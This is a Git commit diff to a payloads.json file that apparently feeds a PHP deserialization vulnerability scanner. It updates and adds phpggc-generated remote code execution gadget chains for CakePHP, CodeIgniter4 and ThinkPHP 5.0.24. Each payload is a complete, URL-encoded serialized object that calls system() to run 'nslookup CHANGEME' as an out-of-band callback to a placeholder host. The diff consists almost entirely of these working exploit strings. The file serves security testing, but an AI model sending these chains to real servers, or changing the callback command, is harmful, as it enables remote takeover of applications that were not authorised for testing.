Update payloads.json

- update CakePHP RCE 1 and RCE2 - add CodeIgniter4 RCE 3 - add ThinkPHP RCE 2
ricardojba · Oct 12, 2021 · a110b8f · a110b8f
1 parent fd44a13
commit a110b8f
Showing 1 changed file with 13 additions and 1 deletion.
diff --git a/res/payloads.json b/res/payloads.json
@@ -3,7 +3,7 @@
     "_needs_dynamic_payload_editing": false,
     "name": "CakePHP ? <= 3.9.6",
     "gen_with": "./phpggc CakePHP/RCE1 <command>",
-    "payload": "O:33:\"Symfony\\Component\\Process\\Process\":4:{s:42:\"%00Symfony\\Component\\Process\\Process%00options\"%3Ba:1:{s:18:\"create_new_console\"%3Bi:0%3B}s:47:\"%00Symfony\\Component\\Process\\Process%00processPipes\"%3BO:14:\"Cake\\ORM\\Table\":1:{s:13:\"%00*%00_behaviors\"%3BO:25:\"Cake\\ORM\\BehaviorRegistry\":2:{s:13:\"%00*%00_methodMap\"%3Ba:1:{s:12:\"readandwrite\"%3Ba:2:{i:0%3Bs:2:\"mb\"%3Bi:1%3Bs:4:\"main\"%3B}}s:10:\"%00*%00_loaded\"%3Ba:1:{s:2:\"mb\"%3BO:22:\"Cake\\Shell\\ServerShell\":4:{s:8:\"%00*%00_host\"%3Bs:85:\"& nslookup CHANGEME &\"%3Bs:8:\"%00*%00_port\"%3Bs:0:\"\"%3Bs:16:\"%00*%00_documentRoot\"%3Bs:0:\"\"%3Bs:6:\"%00*%00_io\"%3BO:22:\"Cake\\Console\\ConsoleIo\":2:{s:7:\"%00*%00_out\"%3BN%3Bs:6:\"_level\"%3Bi:-100%3B}}}}}s:41:\"%00Symfony\\Component\\Process\\Process%00status\"%3Bs:7:\"started\"%3Bs:42:\"%00Symfony\\Component\\Process\\Process%00process\"%3Bi:1%3B}"
+    "payload": "O:33:\"Symfony\\Component\\Process\\Process\":4:{s:42:\"%00Symfony\\Component\\Process\\Process%00options\"%3Ba:1:{s:18:\"create_new_console\"%3Bi:0%3B}s:47:\"%00Symfony\\Component\\Process\\Process%00processPipes\"%3BO:14:\"Cake\\ORM\\Table\":1:{s:13:\"%00*%00_behaviors\"%3BO:25:\"Cake\\ORM\\BehaviorRegistry\":2:{s:13:\"%00*%00_methodMap\"%3Ba:1:{s:12:\"readandwrite\"%3Ba:2:{i:0%3Bs:2:\"mb\"%3Bi:1%3Bs:4:\"main\"%3B}}s:10:\"%00*%00_loaded\"%3Ba:1:{s:2:\"mb\"%3BO:22:\"Cake\\Shell\\ServerShell\":4:{s:8:\"%00*%00_host\"%3Bs:87:\"& nslookup CHANGEME?1634069535 &\"%3Bs:8:\"%00*%00_port\"%3Bs:0:\"\"%3Bs:16:\"%00*%00_documentRoot\"%3Bs:0:\"\"%3Bs:6:\"%00*%00_io\"%3BO:22:\"Cake\\Console\\ConsoleIo\":2:{s:7:\"%00*%00_out\"%3BN%3Bs:6:\"_level\"%3Bi:-100%3B}}}}}s:41:\"%00Symfony\\Component\\Process\\Process%00status\"%3Bs:7:\"started\"%3Bs:42:\"%00Symfony\\Component\\Process\\Process%00process\"%3Bi:1%3B}"
   },
   {
     "_needs_dynamic_payload_editing": false,
@@ -23,6 +23,12 @@
     "gen_with": "./phpggc CodeIgniter4/RCE2 <function> <parameter>",
     "payload": "O:39:\"CodeIgniter\\Cache\\Handlers\\RedisHandler\":1:{s:8:\"%00*%00redis\"%3BO:45:\"CodeIgniter\\Session\\Handlers\\MemcachedHandler\":2:{s:12:\"%00*%00memcached\"%3BO:17:\"CodeIgniter\\Model\":8:{s:10:\"%00*%00builder\"%3BO:32:\"CodeIgniter\\Database\\BaseBuilder\":2:{s:6:\"QBFrom\"%3Ba:1:{i:0%3Bs:2:\"()\"%3B}s:2:\"db\"%3BO:38:\"CodeIgniter\\Database\\MySQLi\\Connection\":0:{}}s:13:\"%00*%00primaryKey\"%3BN%3Bs:15:\"%00*%00beforeDelete\"%3Ba:1:{i:0%3Bs:8:\"validate\"%3B}s:18:\"%00*%00validationRules\"%3Ba:1:{s:4:\"id.x\"%3Ba:1:{s:5:\"rules\"%3Ba:2:{i:0%3Bs:6:\"system\"%3Bi:1%3Bs:2:\"dd\"%3B}}}s:13:\"%00*%00validation\"%3BO:33:\"CodeIgniter\\Validation\\Validation\":1:{s:15:\"%00*%00ruleSetFiles\"%3Ba:1:{i:0%3Bs:5:\"finfo\"%3B}}s:21:\"%00*%00tempAllowCallbacks\"%3Bi:1%3Bs:2:\"db\"%3BO:38:\"CodeIgniter\\Database\\MySQLi\\Connection\":0:{}s:20:\"cleanValidationRules\"%3Bb:0%3B}s:10:\"%00*%00lockKey\"%3Ba:1:{s:1:\"x\"%3Bs:72:\"nslookup CHANGEME\"%3B}}}"
   },
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "CodeIgniter -4.1.3+",
+    "gen_with": "./phpggc CodeIgniter4/RCE3 <function> <parameter>",
+    "payload": "O:39:\"CodeIgniter\\Cache\\Handlers\\RedisHandler\":1:{s:8:\"%00*%00redis\"%3BO:45:\"CodeIgniter\\Session\\Handlers\\MemcachedHandler\":2:{s:12:\"%00*%00memcached\"%3BO:17:\"CodeIgniter\\Model\":8:{s:10:\"%00*%00builder\"%3BO:32:\"CodeIgniter\\Database\\BaseBuilder\":2:{s:6:\"QBFrom\"%3Ba:1:{i:0%3Bs:2:\"()\"%3B}s:2:\"db\"%3BO:38:\"CodeIgniter\\Database\\MySQLi\\Connection\":0:{}}s:13:\"%00*%00primaryKey\"%3BN%3Bs:15:\"%00*%00beforeDelete\"%3Ba:1:{i:0%3Bs:8:\"validate\"%3B}s:18:\"%00*%00validationRules\"%3Ba:1:{s:4:\"id.x\"%3Ba:1:{s:5:\"rules\"%3Ba:2:{i:0%3Bs:6:\"system\"%3Bi:1%3Bs:2:\"dd\"%3B}}}s:13:\"%00*%00validation\"%3BO:33:\"CodeIgniter\\Validation\\Validation\":1:{s:15:\"%00*%00ruleSetFiles\"%3Ba:1:{i:0%3Bs:5:\"finfo\"%3B}}s:21:\"%00*%00tempAllowCallbacks\"%3Bi:1%3Bs:2:\"db\"%3BO:38:\"CodeIgniter\\Database\\MySQLi\\Connection\":0:{}s:20:\"cleanValidationRules\"%3Bb:0%3B}s:10:\"%00*%00lockKey\"%3Ba:1:{s:1:\"x\"%3Bs:72:\"nslookup CHANGEME\"%3B}}}"
+  },
   {
     "_needs_dynamic_payload_editing": false,
     "name": "Drupal 7.0.8 < ?",
@@ -161,6 +167,12 @@
     "gen_with": "./phpggc ThinkPHP/RCE1 <function> <parameter>",
     "payload": "O:27:\"think\\process\\pipes\\Windows\":1:{s:34:\"%00think\\process\\pipes\\Windows%00files\"%3Ba:1:{i:0%3BO:17:\"think\\model\\Pivot\":3:{s:17:\"%00think\\Model%00data\"%3Ba:1:{s:5:\"Smi1e\"%3Bs:72:\"nslookup CHANGEME\"%3B}s:21:\"%00think\\Model%00withAttr\"%3Ba:1:{s:5:\"Smi1e\"%3Bs:6:\"system\"%3B}s:9:\"%00*%00append\"%3Ba:1:{s:5:\"Smi1e\"%3Bs:1:\"1\"%3B}}}}"
   },
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "ThinkPHP 5.0.24",
+    "gen_with": "./phpggc ThinkPHP/RCE1 <function> <parameter>",
+    "payload": "O:27:\"think\\process\\pipes\\Windows\":1:{s:34:\"%00think\\process\\pipes\\Windows%00files\"%3Ba:1:{i:0%3BO:17:\"think\\model\\Pivot\":5:{s:9:\"%00*%00append\"%3Ba:1:{i:0%3Bs:8:\"getError\"%3B}s:8:\"%00*%00error\"%3BO:27:\"think\\model\\relation\\HasOne\":3:{s:15:\"%00*%00selfRelation\"%3Bb:0%3Bs:8:\"%00*%00query\"%3BO:14:\"think\\db\\Query\":1:{s:8:\"%00*%00model\"%3BO:20:\"think\\console\\Output\":2:{s:28:\"%00think\\console\\Output%00handle\"%3BO:30:\"think\\session\\driver\\Memcached\":2:{s:10:\"%00*%00handler\"%3BO:27:\"think\\cache\\driver\\Memcache\":3:{s:10:\"%00*%00options\"%3Ba:5:{s:6:\"expire\"%3Bi:0%3Bs:12:\"cache_subdir\"%3Bb:0%3Bs:6:\"prefix\"%3Bs:0:\"\"%3Bs:4:\"path\"%3Bs:0:\"\"%3Bs:13:\"data_compress\"%3Bb:0%3B}s:10:\"%00*%00handler\"%3BO:13:\"think\\Request\":2:{s:6:\"%00*%00get\"%3Ba:1:{s:18:\"HEXENS<getAttr>no<\"%3Bs:72:\"nslookup CHANGEME\"%3B}s:9:\"%00*%00filter\"%3Bs:6:\"system\"%3B}s:6:\"%00*%00tag\"%3Bb:1%3B}s:9:\"%00*%00config\"%3Ba:7:{s:4:\"host\"%3Bs:9:\"127.0.0.1\"%3Bs:4:\"port\"%3Bi:11211%3Bs:6:\"expire\"%3Bi:3600%3Bs:7:\"timeout\"%3Bi:0%3Bs:12:\"session_name\"%3Bs:6:\"HEXENS\"%3Bs:8:\"username\"%3Bs:0:\"\"%3Bs:8:\"password\"%3Bs:0:\"\"%3B}}s:9:\"%00*%00styles\"%3Ba:1:{i:0%3Bs:7:\"getAttr\"%3B}}}s:11:\"%00*%00bindAttr\"%3Ba:2:{i:0%3Bs:2:\"no\"%3Bi:1%3Bs:3:\"123\"%3B}}s:9:\"%00*%00parent\"%3BO:20:\"think\\console\\Output\":2:{s:28:\"%00think\\console\\Output%00handle\"%3BO:30:\"think\\session\\driver\\Memcached\":2:{s:10:\"%00*%00handler\"%3BO:27:\"think\\cache\\driver\\Memcache\":3:{s:10:\"%00*%00options\"%3Ba:5:{s:6:\"expire\"%3Bi:0%3Bs:12:\"cache_subdir\"%3Bb:0%3Bs:6:\"prefix\"%3Bs:0:\"\"%3Bs:4:\"path\"%3Bs:0:\"\"%3Bs:13:\"data_compress\"%3Bb:0%3B}s:10:\"%00*%00handler\"%3BO:13:\"think\\Request\":2:{s:6:\"%00*%00get\"%3Ba:1:{s:18:\"HEXENS<getAttr>no<\"%3Bs:72:\"nslookup CHANGEME\"%3B}s:9:\"%00*%00filter\"%3Bs:6:\"system\"%3B}s:6:\"%00*%00tag\"%3Bb:1%3B}s:9:\"%00*%00config\"%3Ba:7:{s:4:\"host\"%3Bs:9:\"127.0.0.1\"%3Bs:4:\"port\"%3Bi:11211%3Bs:6:\"expire\"%3Bi:3600%3Bs:7:\"timeout\"%3Bi:0%3Bs:12:\"session_name\"%3Bs:6:\"HEXENS\"%3Bs:8:\"username\"%3Bs:0:\"\"%3Bs:8:\"password\"%3Bs:0:\"\"%3B}}s:9:\"%00*%00styles\"%3Ba:1:{i:0%3Bs:7:\"getAttr\"%3B}}s:15:\"%00*%00selfRelation\"%3Bb:0%3Bs:8:\"%00*%00query\"%3BO:14:\"think\\db\\Query\":1:{s:8:\"%00*%00model\"%3BO:20:\"think\\console\\Output\":2:{s:28:\"%00think\\console\\Output%00handle\"%3BO:30:\"think\\session\\driver\\Memcached\":2:{s:10:\"%00*%00handler\"%3BO:27:\"think\\cache\\driver\\Memcache\":3:{s:10:\"%00*%00options\"%3Ba:5:{s:6:\"expire\"%3Bi:0%3Bs:12:\"cache_subdir\"%3Bb:0%3Bs:6:\"prefix\"%3Bs:0:\"\"%3Bs:4:\"path\"%3Bs:0:\"\"%3Bs:13:\"data_compress\"%3Bb:0%3B}s:10:\"%00*%00handler\"%3BO:13:\"think\\Request\":2:{s:6:\"%00*%00get\"%3Ba:1:{s:18:\"HEXENS<getAttr>no<\"%3Bs:72:\"nslookup CHANGEME\"%3B}s:9:\"%00*%00filter\"%3Bs:6:\"system\"%3B}s:6:\"%00*%00tag\"%3Bb:1%3B}s:9:\"%00*%00config\"%3Ba:7:{s:4:\"host\"%3Bs:9:\"127.0.0.1\"%3Bs:4:\"port\"%3Bi:11211%3Bs:6:\"expire\"%3Bi:3600%3Bs:7:\"timeout\"%3Bi:0%3Bs:12:\"session_name\"%3Bs:6:\"HEXENS\"%3Bs:8:\"username\"%3Bs:0:\"\"%3Bs:8:\"password\"%3Bs:0:\"\"%3B}}s:9:\"%00*%00styles\"%3Ba:1:{i:0%3Bs:7:\"getAttr\"%3B}}}}}}"
+  },
   {
     "_needs_dynamic_payload_editing": false,
     "name": "WordPress/Dompdf/RCE1 <= 0.8.5+ (1)",